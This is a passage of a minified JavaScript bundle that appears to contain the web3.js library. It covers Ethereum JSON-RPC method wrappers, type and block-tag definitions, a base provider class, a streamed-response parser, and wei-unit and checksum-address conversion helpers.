                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "hex",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_getStorageAt",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getTransactionCount = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionCount",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockTransactionCountByHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getBlockTransactionCountByHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getBlockTransactionCountByNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getBlockTransactionCountByNumber",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleCountByBlockHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getUncleCountByBlockHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleCountByBlockNumber = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getUncleCountByBlockNumber",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getCode = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getCode",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.sign = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_sign",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.signTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_signTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.sendTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_sendTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.sendRawTransaction = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_sendRawTransaction",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.call = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_call",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.estimateGas = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_estimateGas",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockByHash = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "bool"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBlockByHash",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getBlockByNumber = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "bool"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBlockByNumber",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionByHash = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getTransactionByHash",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getTransactionByBlockHashAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionByBlockHashAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionByBlockNumberAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getTransactionByBlockNumberAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getTransactionReceipt = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getTransactionReceipt",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getUncleByBlockHashAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getUncleByBlockHashAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getUncleByBlockNumberAndIndex = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag",
                            "hex"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getUncleByBlockNumberAndIndex",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getCompilers = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_getCompilers",
                            params: []
                        });
                    });
                }, t.compileSolidity = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileSolidity",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.compileLLL = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileLLL",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.compileSerpent = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "string"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_compileSerpent",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.newFilter = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "filter"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_newFilter",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.newBlockFilter = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_newBlockFilter",
                            params: []
                        });
                    });
                }, t.newPendingTransactionFilter = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_newPendingTransactionFilter",
                            params: []
                        });
                    });
                }, t.uninstallFilter = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_uninstallFilter",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getFilterChanges = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getFilterChanges",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getFilterLogs = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getFilterLogs",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getLogs = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "filter"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getLogs",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getWork = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_getWork",
                            params: []
                        });
                    });
                }, t.submitWork = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes8",
                            "bytes32",
                            "bytes32"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_submitWork",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.submitHashrate = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "bytes32"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_submitHashrate",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getFeeHistory = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        i.validator.validate([
                            "hex",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]);
                        for (const e of o)i.validator.validate([
                            "number"
                        ], [
                            e
                        ]);
                        return e.send({
                            method: "eth_feeHistory",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getPendingTransactions = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_pendingTransactions",
                            params: []
                        });
                    });
                }, t.requestAccounts = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_requestAccounts",
                            params: []
                        });
                    });
                }, t.getChainId = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_chainId",
                            params: []
                        });
                    });
                }, t.getProof = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "bytes32[]",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_getProof",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getNodeInfo = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "web3_clientVersion",
                            params: []
                        });
                    });
                }, t.createAccessList = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_createAccessList",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                };
            },
            1181: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.personalRpcMethods = t.netRpcMethods = t.ethRpcMethods = void 0;
                const s = o(r(9298));
                t.ethRpcMethods = s;
                const a = o(r(9960));
                t.netRpcMethods = a;
                const u = o(r(6745));
                t.personalRpcMethods = u;
            },
            9960: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isListening = t.getPeerCount = t.getId = void 0, t.getId = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_version",
                            params: []
                        });
                    });
                }, t.getPeerCount = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_peerCount",
                            params: []
                        });
                    });
                }, t.isListening = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_listening",
                            params: []
                        });
                    });
                };
            },
            6745: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ecRecover = t.sign = t.signTransaction = t.sendTransaction = t.importRawKey = t.lockAccount = t.unlockAccount = t.newAccount = t.getAccounts = void 0, t.getAccounts = (e)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_listAccounts",
                            params: []
                        });
                    }), t.newAccount = (e, t)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_newAccount",
                            params: [
                                t
                            ]
                        });
                    }), t.unlockAccount = (e, t, n, i)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_unlockAccount",
                            params: [
                                t,
                                n,
                                i
                            ]
                        });
                    }), t.lockAccount = (e, t)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_lockAccount",
                            params: [
                                t
                            ]
                        });
                    }), t.importRawKey = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_importRawKey",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.sendTransaction = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_sendTransaction",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.signTransaction = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_signTransaction",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.sign = (e, t, n, i)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_sign",
                            params: [
                                t,
                                n,
                                i
                            ]
                        });
                    }), t.ecRecover = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_ecRecover",
                            params: [
                                t,
                                n
                            ]
                        });
                    });
            },
            6325: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5529: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            2453: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            2856: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            6877: (e, t)=>{
                "use strict";
                var r, n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ETH_DATA_FORMAT = t.DEFAULT_RETURN_FORMAT = t.FMT_BYTES = t.FMT_NUMBER = void 0, function(e) {
                    e.NUMBER = "NUMBER_NUMBER", e.HEX = "NUMBER_HEX", e.STR = "NUMBER_STR", e.BIGINT = "NUMBER_BIGINT";
                }(r = t.FMT_NUMBER || (t.FMT_NUMBER = {})), function(e) {
                    e.HEX = "BYTES_HEX", e.UINT8ARRAY = "BYTES_UINT8ARRAY";
                }(n = t.FMT_BYTES || (t.FMT_BYTES = {})), t.DEFAULT_RETURN_FORMAT = {
                    number: r.BIGINT,
                    bytes: n.HEX
                }, t.ETH_DATA_FORMAT = {
                    number: r.HEX,
                    bytes: n.HEX
                };
            },
            9779: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            1517: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8223: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            4205: (e, t)=>{
                "use strict";
                var r, n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.HardforksOrdered = t.BlockTags = void 0, (n = t.BlockTags || (t.BlockTags = {})).EARLIEST = "earliest", n.LATEST = "latest", n.PENDING = "pending", n.SAFE = "safe", n.FINALIZED = "finalized", (r = t.HardforksOrdered || (t.HardforksOrdered = {})).chainstart = "chainstart", r.frontier = "frontier", r.homestead = "homestead", r.dao = "dao", r.tangerineWhistle = "tangerineWhistle", r.spuriousDragon = "spuriousDragon", r.byzantium = "byzantium", r.constantinople = "constantinople", r.petersburg = "petersburg", r.istanbul = "istanbul", r.muirGlacier = "muirGlacier", r.berlin = "berlin", r.london = "london", r.altair = "altair", r.arrowGlacier = "arrowGlacier", r.grayGlacier = "grayGlacier", r.bellatrix = "bellatrix", r.merge = "merge", r.capella = "capella", r.shanghai = "shanghai";
            },
            9970: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(9779), t), i(r(6325), t), i(r(2453), t), i(r(2856), t), i(r(5529), t), i(r(6877), t), i(r(4205), t), i(r(1517), t), i(r(8223), t), i(r(2196), t), i(r(8887), t), i(r(8173), t), i(r(1040), t), i(r(5640), t), i(r(1436), t), i(r(4933), t);
            },
            2196: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8887: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TypedArray = void 0, t.TypedArray = Object.getPrototypeOf(Uint8Array);
            },
            8173: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            1040: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5640: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BaseProvider = void 0;
                const n = Symbol.for("web3/base-provider");
                class i {
                    static isWeb3Provider(e) {
                        return e instanceof i || Boolean(e && e[n]);
                    }
                    get [n]() {
                        return !0;
                    }
                    send(e, t) {
                        this.request(e).then((e)=>{
                            t(null, e);
                        }).catch((e)=>{
                            t(e);
                        });
                    }
                    sendAsync(e) {
                        return r(this, void 0, void 0, function*() {
                            return this.request(e);
                        });
                    }
                }
                t.Web3BaseProvider = i;
            },
            1436: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BaseWallet = void 0, t.Web3BaseWallet = class extends Array {
                    constructor(e){
                        super(), this._accountProvider = e;
                    }
                };
            },
            4933: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            4108: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ChunkResponseParser = void 0;
                const n = r(5071);
                t.ChunkResponseParser = class {
                    constructor(e, t){
                        this.eventEmitter = e, this.autoReconnect = t;
                    }
                    clearQueues() {
                        "function" == typeof this._clearQueues && this._clearQueues();
                    }
                    onError(e) {
                        this._clearQueues = e;
                    }
                    parseResponse(e) {
                        const t = [];
                        return e.replace(/\}[\n\r]?\{/g, "}|--|{").replace(/\}\][\n\r]?\[\{/g, "}]|--|[{").replace(/\}[\n\r]?\[\{/g, "}|--|[{").replace(/\}\][\n\r]?\{/g, "}]|--|{").split("|--|").forEach((e)=>{
                            let r, i = e;
                            this.lastChunk && (i = this.lastChunk + i);
                            try {
                                r = JSON.parse(i);
                            } catch (e) {
                                return this.lastChunk = i, this.lastChunkTimeout && clearTimeout(this.lastChunkTimeout), void (this.lastChunkTimeout = setTimeout(()=>{
                                    this.autoReconnect || (this.clearQueues(), this.eventEmitter.emit("error", new n.InvalidResponseError({
                                        id: 1,
                                        jsonrpc: "2.0",
                                        error: {
                                            code: 2,
                                            message: "Chunk timeout"
                                        }
                                    })));
                                }, 15e3));
                            }
                            clearTimeout(this.lastChunkTimeout), this.lastChunk = void 0, r && t.push(r);
                        }), t;
                    }
                };
            },
            7086: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.toChecksumAddress = t.toWei = t.fromWei = t.toBigInt = t.toNumber = t.toHex = t.toAscii = t.hexToAscii = t.fromAscii = t.asciiToHex = t.hexToString = t.toUtf8 = t.hexToUtf8 = t.stringToHex = t.fromUtf8 = t.utf8ToHex = t.hexToNumberString = t.fromDecimal = t.numberToHex = t.toDecimal = t.hexToNumber = t.hexToBytes = t.bytesToHex = t.bytesToUint8Array = t.ethUnitMap = void 0;
                const n = r(3687), i = r(5487), o = r(7345), s = r(5071), a = BigInt(10), u = (e)=>a ** BigInt(e);
                t.ethUnitMap = {
                    noether: BigInt("0"),
                    wei: BigInt(1),
                    kwei: u(3),
                    Kwei: u(3),
                    babbage: u(3),
                    femtoether: u(3),
                    mwei: u(6),
                    Mwei: u(6),
                    lovelace: u(6),
                    picoether: u(6),
                    gwei: u(9),
                    Gwei: u(9),
                    shannon: u(9),
                    nanoether: u(9),
                    nano: u(9),
                    szabo: u(12),
                    microether: u(12),
                    micro: u(12),
                    finney: u(15),
                    milliether: u(15),
                    milli: u(15),
                    ether: u(18),
                    kether: u(21),
                    grand: u(21),
                    mether: u(24),
                    gether: u(27),
                    tether: u(30)
                }, t.bytesToUint8Array = (e)=>{
                    if (o.validator.validate([
                        "bytes"
                    ], [
                        e
                    ]), e instanceof Uint8Array) return e;
                    if (Array.isArray(e)) return new Uint8Array(e);
                    if ("string" == typeof e) return o.utils.hexToUint8Array(e);
                    throw new s.InvalidBytesError(e);
                };
                const { uint8ArrayToHexString: c } = o.utils;
                t.bytesToHex = (e)=>c((0, t.bytesToUint8Array)(e)), t.hexToBytes = (e)=>"string" == typeof e && "0x" !== e.slice(0, 2).toLowerCase() ? (0, t.bytesToUint8Array)(`0x${e}`) : (0, t.bytesToUint8Array)(e), t.hexToNumber = (e)=>(o.validator.validate([
                        "hex"
                    ], [
                        e
                    ]), o.utils.hexToNumber(e)), t.toDecimal = t.hexToNumber, t.numberToHex = (e, t)=>{
                    "bigint" != typeof e && o.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    let r = o.utils.numberToHex(e);
                    return t && (r.startsWith("-") || r.length % 2 != 1 ? r.length % 2 == 0 && r.startsWith("-") && (r = "-0x0".concat(r.slice(3))) : r = "0x0".concat(r.slice(2))), r;
                }, t.fromDecimal = t.numberToHex, t.hexToNumberString = (e)=>(0, t.hexToNumber)(e).toString(), t.utf8ToHex = (e)=>{
                    o.validator.validate([
                        "string"
                    ], [
                        e
                    ]);
                    let r = e.replace(/^(?:\u0000)/, "");
                    return r = r.replace(/(?:\u0000)$/, ""), (0, t.bytesToHex)((new TextEncoder).encode(r));
                }, t.fromUtf8 = t.utf8ToHex, t.stringToHex = t.utf8ToHex, t.hexToUtf8 = (e)=>(0, i.bytesToUtf8)((0, t.hexToBytes)(e)), t.toUtf8 = (e)=>"string" == typeof e ? (0, t.hexToUtf8)(e) : (o.validator.validate([
                        "bytes"
                    ], [
                        e
                    ]), (0, i.bytesToUtf8)(e)), t.hexToString = t.hexToUtf8, t.asciiToHex = (e)=>{
                    o.validator.validate([
                        "string"
                    ], [
                        e
                    ]);
                    let t = "";
                    for(let r = 0; r < e.length; r += 1){
                        const n = e.charCodeAt(r).toString(16);
                        t += n.length % 2 != 0 ? `0${n}` : n;
                    }
                    return `0x${t}`;
                }, t.fromAscii = t.asciiToHex, t.hexToAscii = (e)=>new TextDecoder("ascii").decode((0, t.hexToBytes)(e)), t.toAscii = t.hexToAscii, t.toHex = (e, r)=>{
                    if ("string" == typeof e && (0, o.isAddress)(e)) return r ? "address" : `0x${e.toLowerCase().replace(/^0x/i, "")}`;
                    if ("boolean" == typeof e) return r ? "bool" : e ? "0x01" : "0x00";
                    if ("number" == typeof e) return r ? e < 0 ? "int256" : "uint256" : (0, t.numberToHex)(e);
                    if ("bigint" == typeof e) return r ? "bigint" : (0, t.numberToHex)(e);
                    if ("object" == typeof e && e) return r ? "string" : (0, t.utf8ToHex)(JSON.stringify(e));
                    if ("string" == typeof e) {
                        if (e.startsWith("-0x") || e.startsWith("-0X")) return r ? "int256" : (0, t.numberToHex)(e);
                        if ((0, o.isHexStrict)(e)) return r ? "bytes" : e;
                        if ((0, o.isHex)(e) && !(0, o.isInt)(e)) return r ? "bytes" : `0x${e}`;
                        if (!Number.isFinite(e)) return r ? "string" : (0, t.utf8ToHex)(e);
                    }
                    throw new s.HexProcessingError(e);
                }, t.toNumber = (e)=>{
                    if ("number" == typeof e) return e;
                    if ("bigint" == typeof e) return e >= Number.MIN_SAFE_INTEGER && e <= Number.MAX_SAFE_INTEGER ? Number(e) : e;
                    if ("string" == typeof e && (0, o.isHexStrict)(e)) return (0, t.hexToNumber)(e);
                    try {
                        return (0, t.toNumber)(BigInt(e));
                    } catch (t) {
                        throw new s.InvalidNumberError(e);
                    }
                }, t.toBigInt = (e)=>{
                    if ("number" == typeof e) return BigInt(e);
                    if ("bigint" == typeof e) return e;
                    if ("string" == typeof e && (0, o.isHex)(e)) return BigInt(e);
                    throw new s.InvalidNumberError(e);
                }, t.fromWei = (e, r)=>{
                    const n = t.ethUnitMap[r];
                    if (!n) throw new s.InvalidUnitError(r);
                    const i = String((0, t.toNumber)(e)), o = n.toString().length - 1;
                    if (o <= 0) return i.toString();
                    const a = i.padStart(o, "0"), u = a.slice(0, -o), c = a.slice(-o).replace(/\.?0+$/, "");
                    return "" === u ? `0.${c}` : "" === c ? u : `${u}.${c}`;
                }, t.toWei = (e, r)=>{
                    o.validator.validate([
                        "number"
                    ], [
                        e
                    ]);
                    const n = t.ethUnitMap[r];
                    if (!n) throw new s.InvalidUnitError(r);
                    const [i, a] = String("string" != typeof e || (0, o.isHexStrict)(e) ? (0, t.toNumber)(e) : e).split(".").concat(""), u = BigInt(`${i}${a}`) * n, c = n.toString().length - 1, l = Math.min(a.length, c);
                    return 0 === l ? u.toString() : u.toString().padStart(l, "0").slice(0, -l);
                }, t.toChecksumAddress = (e)=>{
                    if (!(0, o.isAddress)(e, !1)) throw new s.InvalidAddressError(e);
                    const r = e.toLowerCase().replace(/^0x/i, ""), a = (0, t.bytesToHex)((0, n.keccak256)((0, i.utf8ToBytes)(r)));
                    if ((0, o.isNullish)(a) || "0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470" === a) return "";
                    let u = "0x";
                    const c = a.replace(/^0x/i, "");
                    for(let e = 0; e < r.length; e += 1)parseInt(c[e], 16) > 7 ? u += r[e].toUpperCase() : u += r[e];
                    return u;
                };
            },
            3065: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.format = t.convert = t.convertScalarValue = t.isDataFormat = void 0;
                const n = r(5071), i = r(9970), o = r(7345), s = r(7086), a = r(7151), u = r(2557), c = r(7541), { parseBaseType: l } = o.utils;
                t.isDataFormat = (e)=>"object" == typeof e && !(0, o.isNullish)(e) && "number" in e && "bytes" in e;
                const d = (e, t, r = [])=>{
                    let n, i = Object.assign({}, e);
                    for (const e of t){
                        if (i.oneOf && n) {
                            const e = r.find(function(e) {
                                return this === e[0];
                            }, null != n ? n : "");
                            e && e[0] === n && (i = i.oneOf[e[1]]);
                        }
                        if (!i.properties && !i.items) return;
                        if (i.properties) i = i.properties[e];
                        else if (i.items && i.items.properties) {
                            const t = i.items.properties;
                            if (!t) return;
                            i = t[e];
                        } else i.items && (0, o.isObject)(i.items) ? i = i.items : i.items && Array.isArray(i.items) && (i = i.items[parseInt(e, 10)]);
                        i && e && (n = e);
                    }
                    return i;
                };
                t.convertScalarValue = (e, t, r)=>{
                    try {
                        const { baseType: o, baseTypeSize: a } = l(t);
                        if ("int" === o || "uint" === o) switch(r.number){
                            case i.FMT_NUMBER.NUMBER:
                                return Number((0, s.toBigInt)(e));
                            case i.FMT_NUMBER.HEX:
                                return (0, s.numberToHex)((0, s.toBigInt)(e));
                            case i.FMT_NUMBER.STR:
                                return (0, s.toBigInt)(e).toString();
                            case i.FMT_NUMBER.BIGINT:
                                return (0, s.toBigInt)(e);
                            default:
                                throw new n.FormatterError(`Invalid format: ${String(r.number)}`);
                        }
                        if ("bytes" === o) {
                            let t;
